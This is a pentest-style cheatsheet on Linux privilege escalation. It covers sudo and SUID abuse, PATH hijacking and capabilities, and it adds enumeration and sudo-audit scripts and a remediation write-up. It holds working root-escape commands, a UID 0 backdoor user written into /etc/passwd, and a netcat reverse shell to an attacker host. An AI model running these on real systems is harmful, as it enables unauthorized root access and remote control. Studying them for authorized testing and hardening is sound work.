πŸ›‘οΈ Methodology Checklist

  • sudo -l: identify all allowed commands, plus the Matching Defaults line (env_keep, secure_path)
  • Cross-reference every allowed binary with GTFOBins
  • SUID binaries: find / -perm -4000 -type f 2>/dev/null
  • Cross-reference SUID hits with GTFOBins
  • Check world-writable scripts executed as root
  • Check /etc/passwd and /etc/shadow permissions
  • Inspect /etc/sudoers and /etc/sudoers.d/* for weak entries

🎯 Operational Context

Use when: the user has sudo access. Check sudo -l for NOPASSWD entries, restricted commands with a known bypass, and env_keep entries that let LD_PRELOAD through.
Think Dumber First: sudo -l is the first command after getting a shell. NOPASSWD on any binary: check GTFOBins immediately. sudo vim → :!bash. sudo find → find . -exec /bin/bash \; -quit. Most GTFOBins bypasses take under 30 seconds.
Skip when: sudo requires a password and no password is known; pivot to the other privesc paths (SUID binaries, capabilities, writable root-run scripts).


⚡ Tactical Cheatsheet

Command | Tactical Outcome
sudo -l | List sudo rights; NOPASSWD entries = instant privesc
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null | Find root-owned SUID binaries (bit 4000)
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null | Find binaries with both SUID and SGID set (-perm -6000 requires both bits; use -perm -2000 for SGID alone)
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh | apt-get sudo escape to root shell
PATH=.:$PATH; export PATH | Prepend current dir to PATH for hijacking
echo '/bin/bash -p' > [BINARY_NAME]; chmod +x [BINARY_NAME] | Create fake binary for PATH abuse (drop it in the directory you prepended to PATH)
echo "root2:$(openssl passwd -1 pass):0:0:root:/root:/bin/bash" >> /etc/passwd | Add a UID 0 user (password "pass") if /etc/passwd is writable; double quotes are required, single quotes would write the literal $(...) and break the entry
strings [SUID_BINARY] | Find unqualified command calls (PATH abuse target)
ltrace [SUID_BINARY] | Trace library calls to find unqualified commands (ptrace strips the SUID privilege, so the traced run is unprivileged but the calls are still visible)
sudo /usr/sbin/tcpdump -ln -i [IFACE] -w /dev/null -W 1 -G 1 -z /tmp/.exploit.sh -Z root | tcpdump sudo escape via the -z postrotate command (runs as root after the first rotation)
find /etc/sudoers.d/ -type f 2>/dev/null | Check modular sudoers files
getcap -r / 2>/dev/null | Find binaries with Linux capabilities

🔬 Deep Dive & Workflow

SUID Exploitation Flow

1. find / -user root -perm -4000 2>/dev/null
2. Cross-reference results at GTFOBins (https://gtfobins.github.io/)
3. Look for non-standard/unexpected binaries with SUID
4. Custom binaries: strings β†’ ltrace β†’ identify unqualified calls
5. Small 's' = SUID+exec set (exploitable)
   Capital 'S' = SUID only, no exec bit (usually broken)
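The Methodology Checklist at the top and the five steps above are one enumeration pass, so here is that pass as a script. This is an added example, not code from the original page: every function takes the tree to scan as an argument (so it can be pointed at a test directory), and BASELINE_SUID is an assumed list of SUID binaries present on a stock Debian/Ubuntu install, used only to flag anything unexpected for manual GTFOBins cross-referencing.

```shell
#!/bin/sh
# privesc_enum.sh: added example (not code from the original page) that scripts
# the Methodology Checklist and the SUID Exploitation Flow. Every function takes
# the tree to scan as its first argument (default /). Assumption: BASELINE_SUID
# is a stock Debian/Ubuntu list; any other SUID binary is flagged NON-STANDARD.

BASELINE_SUID="passwd su sudo mount umount newgrp chsh chfn gpasswd fusermount fusermount3 pkexec ping"

# Owner-exec bit of one file: "s" = SUID + exec (exploitable),
# "S" = SUID without exec (usually broken). Non-SUID files return 1.
suid_class() {
    bit=$(ls -ld "$1" 2>/dev/null | cut -c4)
    case "$bit" in
        s) echo s ;;
        S) echo S ;;
        *) return 1 ;;
    esac
}

# SUID files under $1, one per line: "<s|S> <owner> <standard|NON-STANDARD> <path>".
find_suid() {
    root=${1:-/}
    find "$root" -xdev -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        cls=$(suid_class "$f") || continue
        owner=$(ls -ld "$f" | awk '{print $3}')
        tag=standard
        case " $BASELINE_SUID " in
            *" ${f##*/} "*) ;;
            *) tag=NON-STANDARD ;;
        esac
        printf '%s %s %s %s\n' "$cls" "$owner" "$tag" "$f"
    done
}

# World-writable files in the places root runs scripts from (cron, init, profile.d).
writable_root_scripts() {
    root=${1:-/}; root=${root%/}
    for d in etc/cron.d etc/cron.hourly etc/cron.daily etc/cron.weekly etc/init.d etc/profile.d; do
        [ -d "$root/$d" ] && find "$root/$d" -type f -perm -0002 2>/dev/null
    done
    return 0
}

# Flag /etc/passwd or /etc/shadow if the current user can write them.
writable_passwd_shadow() {
    root=${1:-/}; root=${root%/}
    for f in "$root/etc/passwd" "$root/etc/shadow"; do
        [ -w "$f" ] && echo "WRITABLE $f"
    done
    return 0
}

# Lines from sudoers and sudoers.d worth a second look: NOPASSWD, env_keep,
# LD_PRELOAD and wildcards (comments and blank lines dropped).
weak_sudoers_lines() {
    root=${1:-/}; root=${root%/}
    cat "$root/etc/sudoers" "$root"/etc/sudoers.d/* 2>/dev/null |
        grep -Ev '^[[:space:]]*(#|$)' |
        grep -E 'NOPASSWD|env_keep|LD_PRELOAD|\*' || true
}

# File capabilities (getcap comes with libcap; silently skipped when absent).
file_caps() {
    command -v getcap >/dev/null 2>&1 && getcap -r "${1:-/}" 2>/dev/null
    return 0
}

main() {
    echo "== SUID (s = exploitable, S = no exec bit; check NON-STANDARD hits on GTFOBins) =="
    find_suid "$1"
    echo "== world-writable root-run scripts =="; writable_root_scripts "$1"
    echo "== passwd/shadow =="; writable_passwd_shadow "$1"
    echo "== weak sudoers entries =="; weak_sudoers_lines "$1"
    echo "== file capabilities =="; file_caps "$1"
}

# Stand-alone: sh privesc_enum.sh /   (sudo -l is left to you, it may prompt)
if [ "$#" -gt 0 ]; then main "$1"; fi
```

Run it from the low-privileged shell you are escalating from: root sees every file as writable, so writable_passwd_shadow and the world-writable check only mean something for the unprivileged user.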

High-value SUID targets:

Binary | Exploit Method
find | find . -exec /bin/sh -p \; -quit
vim | :!/bin/sh -p (a plain :!/bin/bash drops the elevated EUID; the shell needs -p)
python | python -c 'import os; os.execl("/bin/sh","sh","-p")'
nmap (old, 2.02 to 5.21) | nmap --interactive, then !sh
pkexec | PwnKit, CVE-2021-4034
screen 4.5.0 | Known LPE (root-privileged logfile creation abused to write /etc/ld.so.preload)

Sudo Abuse Patterns

# sudo -l reveals: (root) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'
 
# (root) NOPASSWD: /usr/sbin/tcpdump
cat > /tmp/.exploit.sh << 'EOF'
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [LHOST] [LPORT] >/tmp/f
EOF
chmod +x /tmp/.exploit.sh
sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.exploit.sh -Z root
 
# (root) NOPASSWD: /usr/bin/apt-get
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

AppArmor note: Ubuntu ships an AppArmor profile for tcpdump (/etc/apparmor.d/usr.sbin.tcpdump) that stops the -z postrotate command from executing an arbitrary script, so the escape above fails with "Permission denied" even though tcpdump runs as root (seen on 20.04 and later). Check aa-status; a GTFOBins entry that works elsewhere can fail here for this reason alone.

PATH Hijacking

# 1. Find SUID binary that calls commands without absolute path
strings /usr/local/sbin/suid_binary | grep -v '/'
# β†’ finds unqualified "cat", "id", "ls" etc.
 
# 2. Create fake binary in writable location
cd /tmp
echo '/bin/bash -p' > cat
chmod +x cat
 
# 3. Prepend /tmp to PATH
PATH=/tmp:$PATH
export PATH
 
# 4. Run SUID binary β†’ it calls /tmp/cat instead of /bin/cat β†’ root shell
/usr/local/sbin/suid_binary

Caveat: this only works when the binary resolves the command through PATH (system(), popen(), execvp(), or a shell script it spawns); a hard-coded absolute path cannot be hijacked. The dynamic loader ignores LD_PRELOAD and LD_LIBRARY_PATH for SUID binaries, but PATH is not sanitised, which is why this lever survives. The fake must run bash with -p, otherwise bash resets the effective UID to the real UID and you are left with your own shell.
Cleanup: restore PATH (or use absolute paths during exploitation) and remove the fake binary when done.
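The four steps above as a checker. This is an added example, not the page's code: unqualified_cmds takes the first word of every printable string in the binary (so "cat /etc/foo" yields cat while "/bin/cat" is skipped) and keeps the names that resolve to a real executable; hijack_dir then walks PATH in order and reports the first writable directory searched before the genuine binary. The assumption is that the target resolves names through PATH (system(), popen(), execvp(), or a script it spawns); confirm a hit with ltrace before relying on it.

```shell
#!/bin/sh
# path_hijack_check.sh: added example, not code from the original page. Given a
# binary, list the command names it references without a slash that resolve to
# a real executable here, then show which PATH entry a lookup reaches first and
# whether we can write there. Assumption: the target resolves those names via
# PATH; a hit is a candidate to confirm with ltrace, not proof.

# Candidate command names in a file: first word of every printable string,
# no slash, lowercase [a-z0-9_.-], resolving via `command -v` to a path.
unqualified_cmds() {
    tr -c '[:print:]' '\n' < "$1" | awk '{print $1}' |
        grep -E '^[a-z][a-z0-9_.-]{1,31}$' | sort -u |
        while IFS= read -r name; do
            p=$(command -v "$name" 2>/dev/null) || continue
            case "$p" in /*) echo "$name" ;; esac   # skip builtins (cd, test, ...)
        done
}

# Walk PATH in order for NAME: "<n> <dir> <WRITABLE|readonly> <hit|->" per entry,
# stopping at the first directory that holds an executable NAME.
path_lookup_order() {
    name=$1 n=0
    printf '%s\n' "$PATH" | tr ':' '\n' | while IFS= read -r dir; do
        n=$((n + 1))
        [ -z "$dir" ] && dir=.                    # empty PATH entry means cwd
        w=readonly; [ -w "$dir" ] && w=WRITABLE
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            printf '%d %s %s hit\n' "$n" "$dir" "$w"; break
        fi
        printf '%d %s %s -\n' "$n" "$dir" "$w"
    done
}

# First writable PATH directory searched before the real NAME. Prints it and
# returns 0; returns 1 (prints nothing) when the real binary wins the lookup.
hijack_dir() {
    path_lookup_order "$1" | {
        while read -r n dir w hit; do
            [ "$hit" = hit ] && exit 1
            [ "$w" = WRITABLE ] && { echo "$dir"; exit 0; }
        done
        exit 1
    }
}

# Stand-alone: sh path_hijack_check.sh /usr/local/sbin/suid_binary
if [ "$#" -gt 0 ]; then
    unqualified_cmds "$1" | while IFS= read -r c; do
        if d=$(hijack_dir "$c"); then
            echo "$c: hijackable, writable $d is searched before $(command -v "$c")"
        else
            echo "$c: real binary is found first; prepend a writable dir (PATH=/tmp:\$PATH) and rerun"
        fi
    done
fi
```

Run it with the PATH the SUID binary will actually see (after your PATH=/tmp:$PATH), and as the unprivileged user: root reports every directory as WRITABLE.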

Linux Capabilities (Alternative to SUID)

# Enumerate capabilities
getcap -r / 2>/dev/null
# Direct root: cap_setuid, cap_setgid, cap_sys_admin, cap_sys_ptrace, cap_dac_override,
# cap_dac_read_search (reads /etc/shadow); cap_net_raw only gives packet capture, not root
 
# python3 with cap_setuid
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

πŸ› οΈ Troubleshooting & Edge Cases

Problem | Cause | Fix
sudo -l prompts for a password | sudo skips the prompt for -l only when at least one of the user's rules is NOPASSWD (Defaults listpw=any, the default) | Run it anyway; if it prompts, try the credential the user logged in with or any password recovered from the box
sudo command escapes not working | Shell escape restricted or not applicable to that binary | Read the Matching Defaults block of sudo -l: env_keep+=LD_PRELOAD means any allowed command loads your .so as root (sudo LD_PRELOAD=/tmp/x.so <allowed cmd>, with a constructor that calls setuid(0) and execs a shell)
Binary is on GTFOBins but no shell appears | AppArmor or SELinux confining the binary | Check aa-status or sestatus; a profile can block the escape even under sudo or SUID
Old sudo version (CVE-2021-3156, Baron Samedit) | sudo < 1.9.5p2 (1.8.2 to 1.8.31p2 and 1.9.0 to 1.9.5p1) | sudo --version; an unpatched build answers sudoedit -s / with "sudoedit: /: not a regular file", a patched one prints usage; public PoCs exist on GitHub
Restricted sudo rule with command arguments | Wildcard in the allowed command, e.g. (root) /usr/bin/vim /etc/hosts* | The * also matches extra arguments: sudo /usr/bin/vim /etc/hosts -c ':!/bin/bash'
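A small auditor for sudo -l output that flags the patterns from the Sudo Abuse Patterns section and this table in one pass. This is an added example, not code from the page: ESCAPE_BINS is an assumed subset of the GTFOBins sudo list, and the finding wording is my own. Feed it the live output or a saved copy; the same check run over /etc/sudoers before deployment is the review the Reporting Trigger below asks for.

```shell
#!/bin/sh
# sudo_l_audit.sh: added example, not code from the original page. Reads the
# output of `sudo -l` on stdin and flags: NOPASSWD rules, binaries with a known
# shell escape, wildcards in arguments, ALL, and env_keep passing LD_*.
# Assumption: ESCAPE_BINS is a small subset of the GTFOBins sudo list chosen
# for the example; extend it from https://gtfobins.github.io/ for real audits.

ESCAPE_BINS="vim vi view nano less more man find awk gawk python python2 python3 perl ruby env bash sh dash zsh apt apt-get tcpdump nmap git tar zip ftp gdb socat"

# One finding per line: "<HIGH|MEDIUM> <reason>: <rule or default>".
audit_sudo_l() {
    while IFS= read -r line; do
        case $line in
            *env_keep*LD_PRELOAD*|*env_keep*LD_LIBRARY_PATH*)
                echo "HIGH env_keep lets LD_* through sudo (preload a .so that spawns a shell): $line"
                continue ;;
            *\(*\)*) ;;            # a rule line: "(runas) [NOPASSWD:] cmd[, cmd...]"
            *) continue ;;
        esac
        nopass=no; case $line in *NOPASSWD:*) nopass=yes ;; esac
        rest=${line#*\)}           # strip "(runas)"
        rest=${rest#*NOPASSWD:}    # strip the tag when present, keep the command list
        printf '%s\n' "$rest" | tr ',' '\n' | {
            set -f                 # no globbing: "/etc/hosts*" must stay literal
            while IFS= read -r spec; do
                set -- $spec       # word-split; $1 is the command, $* the normalised rule
                [ $# -eq 0 ] && continue
                spec=$*; bin=${1##*/}
                [ "$nopass" = yes ] && echo "HIGH NOPASSWD, no credential needed: $spec"
                [ "$spec" = ALL ] && echo "HIGH any command as the runas user: $spec"
                case " $ESCAPE_BINS " in
                    *" $bin "*) echo "HIGH $bin has a shell escape, check GTFOBins: $spec" ;;
                esac
                case $spec in
                    *\**) echo "MEDIUM wildcard matches extra arguments (e.g. -c ':!/bin/bash'): $spec" ;;
                esac
            done
        }
    done
    return 0
}

# Stand-alone: sudo -l 2>/dev/null | sh sudo_l_audit.sh -   (or: sh sudo_l_audit.sh - < saved.txt)
if [ "${1-}" = "-" ]; then audit_sudo_l; fi
```

A rule that is silent here is not automatically safe: a fixed-argument rule such as /bin/systemctl restart apache2 still deserves a look at what that command does with the files and environment it inherits.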

πŸ“ Reporting Trigger

Finding Title: Sudo Misconfiguration Enables Privilege Escalation to Root
Impact: A NOPASSWD sudo entry or otherwise exploitable sudo configuration lets the compromised user execute commands as root without authenticating, giving complete control of the system with no further vulnerability required.
Root Cause: Sudo rules grant NOPASSWD access to binaries with known shell escapes (vim, find, python, perl, tcpdump, apt-get), or use wildcards and env_keep settings (LD_PRELOAD) that defeat the intended restriction. The rules were never audited against the GTFOBins escape catalog.
Recommendation: Review all sudo rules and remove NOPASSWD entries for interactive binaries. Use sudoedit for file editing rather than sudo vim. Restrict sudo to specific commands with exact arguments and avoid wildcards. Keep env_reset and do not add LD_PRELOAD or LD_LIBRARY_PATH to env_keep. Audit every allowed binary against GTFOBins.